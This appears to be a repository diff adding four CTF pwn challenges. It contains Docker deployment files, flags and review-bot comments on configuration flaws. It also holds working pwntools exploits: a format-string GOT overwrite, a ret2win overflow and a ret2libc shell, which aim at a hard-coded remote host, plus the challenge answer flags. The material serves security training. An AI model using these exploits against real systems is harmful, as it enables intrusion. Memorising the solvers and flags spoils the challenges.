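--- a/2026-2027/pwn/archivist/Dockerfile
+++ b/2026-2027/pwn/archivist/Dockerfile
@@ -0,0 +1,32 @@
+FROM ubuntu:22.04
+
+RUN apt-get update && apt-get install -y socat && rm -rf /var/lib/apt/lists/*
+
+RUN useradd -m ctf
+
+WORKDIR /home/ctf
+
+COPY ./archivist ./chall
+COPY ./flag.txt .
+COPY ./libc.so.6 .
+COPY ./entrypoint.sh .
+COPY ./ld-linux-x86-64.so.2 .
+
+USER root
+
+RUN chown -R root:root /home/ctf
+
+# - Directory: root can write, others can only enter/list (755)
+# - Binary/Script: root can write, others can only execute (755)
+# - Libc/Flag: root can write, others can only read (444)
+RUN chmod 755 /home/ctf && \
+chmod 755 /home/ctf/chall && \
+chmod 754 /home/ctf/entrypoint.sh && \
+chmod 444 /home/ctf/libc.so.6 && \
+chmod 444 /home/ctf/flag.txt && \
+chmod 755 /home/ctf/ld-linux-x86-64.so.2
+
+USER ctf
+EXPOSE 5000
+
+ENTRYPOINT ["./entrypoint.sh"]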
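Review bot: `chmod 754 /home/ctf/entrypoint.sh` leaves the script without execute permission for the `ctf` user. The preceding `chown -R root:root /home/ctf` puts `ctf` in the "other" class (r--), while `USER ctf` plus `ENTRYPOINT ["./entrypoint.sh"]` has to exec the file, so the container would be expected to fail at start with a permission error. The comment above the chmod block already says scripts are 755; the line should read `chmod 755 /home/ctf/entrypoint.sh && \`. The same line appears in the babypwn, dilema and mines Dockerfiles. Separately, `USER root` has no effect here because no earlier `USER` instruction was set.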
Binary file added 2026-2027/pwn/archivist/archivist
Binary file not shown.
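--- a/2026-2027/pwn/archivist/clean.sh
+++ b/2026-2027/pwn/archivist/clean.sh
@@ -0,0 +1,2 @@
+sudo docker rm -f archivist_cont
+sudo docker rmi archivist_image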
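--- a/2026-2027/pwn/archivist/description.txt
+++ b/2026-2027/pwn/archivist/description.txt
@@ -0,0 +1,2 @@
+Don't worry, I used printf.
+Nothing could possibly go wrong.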
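--- a/2026-2027/pwn/archivist/entrypoint.sh
+++ b/2026-2027/pwn/archivist/entrypoint.sh
@@ -0,0 +1,9 @@
+#!/bin/sh
+
+ulimit -t 60
+# Limit max memory (KB) - 64MB is plenty for most SROP/Pwn
+ulimit -m 65536
+# Limit core dump size (prevents filling up disk)
+ulimit -c 0
+
+exec socat -T 30 -d TCP-LISTEN:5000,reuseaddr,fork EXEC:"./ld-linux-x86-64.so.2 --library-path /home/ctf ./chall",stderr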
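Review bot: `ulimit -m 65536` does not cap memory on current Linux kernels, because the resident-set limit it sets is not enforced; the only effective memory bound is then the container-wide `--memory` in run.sh, shared by every forked connection. If a per-connection cap is intended, an address-space limit such as `ulimit -v 65536` is enforced (the value would need testing against the bundled loader and libc), and the comment should name the limit actually relied on. The socat listener also forks without a connection cap; adding `max-children=<n>` to the `TCP-LISTEN` address would keep a single client from using up the `--pids-limit`. The same lines appear in the babypwn, dilema and mines entrypoint.sh.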
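--- a/2026-2027/pwn/archivist/exploit.py
+++ b/2026-2027/pwn/archivist/exploit.py
@@ -0,0 +1,39 @@
+from pwn import *
+
+binary='./archivist'
+elf = context.binary = ELF(binary, checksec=False)
+libc = ELF('./libc.so.6',checksec=False)
+#p=process(binary)
+p=remote("15.206.88.115",1330)
+#gdb.attach(p)
+#context.log_level='debug'
+
+exit_got=0x404028
+main=0x4012b0
+printf_got=0x404010
+# infinite printfs
+p.recvuntil(b'> ')
+payload=fmtstr_payload(6,{exit_got:main})
+print(payload)
+p.send(payload)
+
+
+# getting libc base
+p.recvuntil(b'> ')
+p.sendline(b'%7$p')
+p.recvuntil(b'Archivist Echo: ')
+libc_leak=int(p.recvline()[:-1],16)
+libcbase=libc_leak-0x202030
+libc.address=libcbase
+system=libc.symbols['system']
+log.critical(f"Libc leak : {hex(libc_leak)}")
+log.critical(f"Libc base : {hex(libcbase)}")
+log.critical(f"system : {hex(system)}")
+
+p.recvuntil(b'> ')
+payload=fmtstr_payload(6,{printf_got:system})
+print(payload)
+p.send(payload)
+
+p.send(b'/bin/sh') # lil buggy , send input as /bin/sh
+p.interactive()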
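Review bot: The solver hard-codes the live service address in `p=remote("15.206.88.115",1330)`, which ties the committed script to one deployment and publishes the host in the repository; reading host and port from the command line or environment would avoid both. The fixed addresses and the `0x202030` offset carry no comment saying which build of `archivist` and `libc.so.6` they were taken from, so a rebuilt binary silently breaks this script as a deployment health check. A short comment recording the checksum of the binaries these values belong to would make that visible. The babypwn and dilema solvers hard-code the same host.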
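--- a/2026-2027/pwn/archivist/flag.txt
+++ b/2026-2027/pwn/archivist/flag.txt
@@ -0,0 +1 @@
+sudo{f0rm47_s7rings_4r3_700_0ld}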
Binary file added 2026-2027/pwn/archivist/ld-linux-x86-64.so.2
Binary file not shown.
Binary file added 2026-2027/pwn/archivist/libc.so.6
Binary file not shown.
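--- a/2026-2027/pwn/archivist/run.sh
+++ b/2026-2027/pwn/archivist/run.sh
@@ -0,0 +1,12 @@
+sudo docker build -t archivist_image .
+
+
+sudo docker run -d \
+--name archivist_cont \
+--restart always \
+--memory="256m" \
+--memory-swap="256m" \
+--cpus=".5" \
+--pids-limit=100 \
+-p 1330:5000 \
+archivist_image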
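Review bot: The `docker run` invocation sets resource limits but no privilege restrictions, although players of a pwn challenge are expected to end up with code execution inside this container. Adding `--read-only`, `--cap-drop=ALL` and `--security-opt no-new-privileges` would keep one player from leaving files behind for others and from using setuid binaries shipped in the base image. The script also has no shebang or `set -e`, so a failed `docker build` still goes on to start whatever `archivist_image` already exists locally. The babypwn and dilema run.sh differ only in names and ports and need the same change.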
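--- a/2026-2027/pwn/babypwn/Dockerfile
+++ b/2026-2027/pwn/babypwn/Dockerfile
@@ -0,0 +1,28 @@
+FROM ubuntu:22.04
+
+RUN apt-get update && apt-get install -y socat && rm -rf /var/lib/apt/lists/*
+
+RUN useradd -m ctf
+
+WORKDIR /home/ctf
+
+COPY ./babypwn ./chall
+COPY ./flag.txt .
+COPY ./entrypoint.sh .
+
+USER root
+
+RUN chown -R root:root /home/ctf
+
+# - Directory: root can write, others can only enter/list (755)
+# - Binary/Script: root can write, others can only execute (755)
+# - Libc/Flag: root can write, others can only read (444)
+RUN chmod 755 /home/ctf && \
+chmod 755 /home/ctf/chall && \
+chmod 754 /home/ctf/entrypoint.sh && \
+chmod 444 /home/ctf/flag.txt
+
+USER ctf
+EXPOSE 5000
+
+ENTRYPOINT ["./entrypoint.sh"]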
Binary file added 2026-2027/pwn/babypwn/babypwn
Binary file not shown.
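--- a/2026-2027/pwn/babypwn/clean.sh
+++ b/2026-2027/pwn/babypwn/clean.sh
@@ -0,0 +1,2 @@
+sudo docker rm -f babypwn_cont
+sudo docker rmi babypwn_image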
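--- a/2026-2027/pwn/babypwn/description.txt
+++ b/2026-2027/pwn/babypwn/description.txt
@@ -0,0 +1 @@
+Every pro was once a Babypwn noob.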
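--- a/2026-2027/pwn/babypwn/entrypoint.sh
+++ b/2026-2027/pwn/babypwn/entrypoint.sh
@@ -0,0 +1,9 @@
+#!/bin/sh
+
+ulimit -t 60
+# Limit max memory (KB) - 64MB is plenty for most SROP/Pwn
+ulimit -m 65536
+# Limit core dump size (prevents filling up disk)
+ulimit -c 0
+
+exec socat -T 30 -d TCP-LISTEN:5000,reuseaddr,fork EXEC:"./chall",stderr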
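--- a/2026-2027/pwn/babypwn/exploit.py
+++ b/2026-2027/pwn/babypwn/exploit.py
@@ -0,0 +1,11 @@
+from pwn import *
+
+binary='./babypwn'
+elf = context.binary = ELF(binary, checksec=False)
+#p=process(binary)
+p=remote("15.206.88.115",1331)
+#gdb.attach(p)
+win=0x401196
+ret=0x40101a
+p.sendline(b'A'*0x48+p64(ret)+p64(win))
+p.interactive()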
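--- a/2026-2027/pwn/babypwn/flag.txt
+++ b/2026-2027/pwn/babypwn/flag.txt
@@ -0,0 +1 @@
+sudo{73h_cl4ssic_r372win}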
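--- a/2026-2027/pwn/babypwn/run.sh
+++ b/2026-2027/pwn/babypwn/run.sh
@@ -0,0 +1,12 @@
+sudo docker build -t babypwn_image .
+
+
+sudo docker run -d \
+--name babypwn_cont \
+--restart always \
+--memory="256m" \
+--memory-swap="256m" \
+--cpus=".5" \
+--pids-limit=100 \
+-p 1331:5000 \
+babypwn_image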
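--- a/2026-2027/pwn/dilema/Dockerfile
+++ b/2026-2027/pwn/dilema/Dockerfile
@@ -0,0 +1,32 @@
+FROM ubuntu:22.04
+
+RUN apt-get update && apt-get install -y socat && rm -rf /var/lib/apt/lists/*
+
+RUN useradd -m ctf
+
+WORKDIR /home/ctf
+
+COPY ./chall ./chall
+COPY ./flag.txt .
+COPY ./libc.so.6 .
+COPY ./entrypoint.sh .
+COPY ./ld-linux.so.2 .
+
+USER root
+
+RUN chown -R root:root /home/ctf
+
+# - Directory: root can write, others can only enter/list (755)
+# - Binary/Script: root can write, others can only execute (755)
+# - Libc/Flag: root can write, others can only read (444)
+RUN chmod 755 /home/ctf && \
+chmod 755 /home/ctf/chall && \
+chmod 754 /home/ctf/entrypoint.sh && \
+chmod 444 /home/ctf/libc.so.6 && \
+chmod 444 /home/ctf/flag.txt && \
+chmod 755 /home/ctf/ld-linux.so.2
+
+USER ctf
+EXPOSE 5000
+
+ENTRYPOINT ["./entrypoint.sh"]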
Binary file added 2026-2027/pwn/dilema/chall
Binary file not shown.
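--- a/2026-2027/pwn/dilema/clean.sh
+++ b/2026-2027/pwn/dilema/clean.sh
@@ -0,0 +1,2 @@
+sudo docker rm -f dilema_cont
+sudo docker rmi dilema_image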
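--- a/2026-2027/pwn/dilema/description.txt
+++ b/2026-2027/pwn/dilema/description.txt
@@ -0,0 +1 @@
+Back to the 32-bit days… smaller registers, bigger headaches.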
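--- a/2026-2027/pwn/dilema/entrypoint.sh
+++ b/2026-2027/pwn/dilema/entrypoint.sh
@@ -0,0 +1,9 @@
+#!/bin/sh
+
+ulimit -t 60
+# Limit max memory (KB) - 64MB is plenty for most SROP/Pwn
+ulimit -m 65536
+# Limit core dump size (prevents filling up disk)
+ulimit -c 0
+
+exec socat -T 30 -d TCP-LISTEN:5000,reuseaddr,fork EXEC:"./ld-linux.so.2 --library-path /home/ctf ./chall",stderr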
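--- a/2026-2027/pwn/dilema/exploit.py
+++ b/2026-2027/pwn/dilema/exploit.py
@@ -0,0 +1,46 @@
+from pwn import *
+binary = "./chall"
+elf=ELF(binary)
+libc=ELF("./libc.so.6")
+#p=process(binary)
+p=remote("15.206.88.115",1332)
+#gdb.attach(p)
+
+puts_plt=elf.plt['puts']
+puts_got=elf.got['puts']
+main=elf.symbols['main']
+
+log.success(f"puts_plt adress {hex(puts_plt)}")
+log.success(f"puts_got adress {hex(puts_got)}")
+log.success(f"main adress {hex(main)}")
+
+
+p.recvuntil("fate")
+p.sendline(b"1")
+p.recvuntil("words:")
+
+payload=b"A"*76+p32(puts_plt)+p32(main)+p32(puts_got)
+p.sendline(payload)
+p.recvuntil("enough :(")
+p.recvline()
+
+leaked_puts=u32(p.recvline().strip()[:4])
+log.success(f"Leaked puts {hex(leaked_puts)}")
+
+libcbase=leaked_puts-libc.symbols['puts']
+system=libcbase+libc.symbols['system']
+binsh=libcbase+next(libc.search(b'/bin/sh'))
+
+log.success(f"Leaked libcbase {hex(libcbase)}")
+log.success(f"Leaked system {hex(system)}")
+log.success(f"Leaked binsh {hex(binsh)}")
+
+p.recvuntil("fate")
+p.sendline(b"1")
+p.recvuntil("words:")
+
+payload=b"A"*76+p32(system)+b"BBBB"+p32(binsh)
+p.sendline(payload)
+
+
+p.interactive()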
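--- a/2026-2027/pwn/dilema/flag.txt
+++ b/2026-2027/pwn/dilema/flag.txt
@@ -0,0 +1 @@
+sudo{i_b3gg3d_s0_h4rd_i_g07_7h3_fl4g}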
Binary file added 2026-2027/pwn/dilema/ld-linux.so.2
Binary file not shown.
Binary file added 2026-2027/pwn/dilema/libc.so.6
Binary file not shown.
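--- a/2026-2027/pwn/dilema/run.sh
+++ b/2026-2027/pwn/dilema/run.sh
@@ -0,0 +1,12 @@
+sudo docker build -t dilema_image .
+
+
+sudo docker run -d \
+--name dilema_cont \
+--restart always \
+--memory="256m" \
+--memory-swap="256m" \
+--cpus=".5" \
+--pids-limit=100 \
+-p 1332:5000 \
+dilema_image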
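--- a/2026-2027/pwn/mines/Dockerfile
+++ b/2026-2027/pwn/mines/Dockerfile
@@ -0,0 +1,32 @@
+FROM ubuntu:22.04
+
+RUN apt-get update && apt-get install -y socat && rm -rf /var/lib/apt/lists/*
+
+RUN useradd -m ctf
+
+WORKDIR /home/ctf
+
+COPY ./mines ./chall
+COPY ./flag.txt .
+COPY ./entrypoint.sh .
+
+USER root
+
+RUN dpkg --add-architecture i386 && \
+apt-get update && \
+apt-get install -y libc6:i386
+
+RUN chown -R root:root /home/ctf
+
+# - Directory: root can write, others can only enter/list (755)
+# - Binary/Script: root can write, others can only execute (755)
+# - Libc/Flag: root can write, others can only read (444)
+RUN chmod 755 /home/ctf && \
+chmod 755 /home/ctf/chall && \
+chmod 754 /home/ctf/entrypoint.sh && \
+chmod 444 /home/ctf/flag.txt
+
+USER ctf
+EXPOSE 5000
+
+ENTRYPOINT ["./entrypoint.sh"]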
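Review bot: The second package step, `apt-get install -y libc6:i386`, never removes `/var/lib/apt/lists/*`, so the package index stays in the final image even though the first `RUN` cleaned it up. Ending the step with `apt-get install -y --no-install-recommends libc6:i386 && rm -rf /var/lib/apt/lists/*` fixes that. Unlike archivist and dilema, this challenge takes its 32-bit libc from an unpinned package under a floating `ubuntu:22.04` tag, so a later rebuild may serve a different libc than the one the challenge was tested with. Pinning the base image by digest, or bundling the loader and libc as the other challenges do, keeps the deployed environment reproducible.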
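--- a/2026-2027/pwn/mines/clean.sh
+++ b/2026-2027/pwn/mines/clean.sh
@@ -0,0 +1,2 @@
+sudo docker rm -f mines_cont
+sudo docker rmi mines_image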
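--- a/2026-2027/pwn/mines/description.txt
+++ b/2026-2027/pwn/mines/description.txt
@@ -0,0 +1 @@
+Mines have been laid…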
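--- a/2026-2027/pwn/mines/entrypoint.sh
+++ b/2026-2027/pwn/mines/entrypoint.sh
@@ -0,0 +1,9 @@
+#!/bin/sh
+
+ulimit -t 60
+# Limit max memory (KB) - 64MB is plenty for most SROP/Pwn
+ulimit -m 65536
+# Limit core dump size (prevents filling up disk)
+ulimit -c 0
+
+exec socat -T 30 -d TCP-LISTEN:5000,reuseaddr,fork EXEC:"./chall",stderr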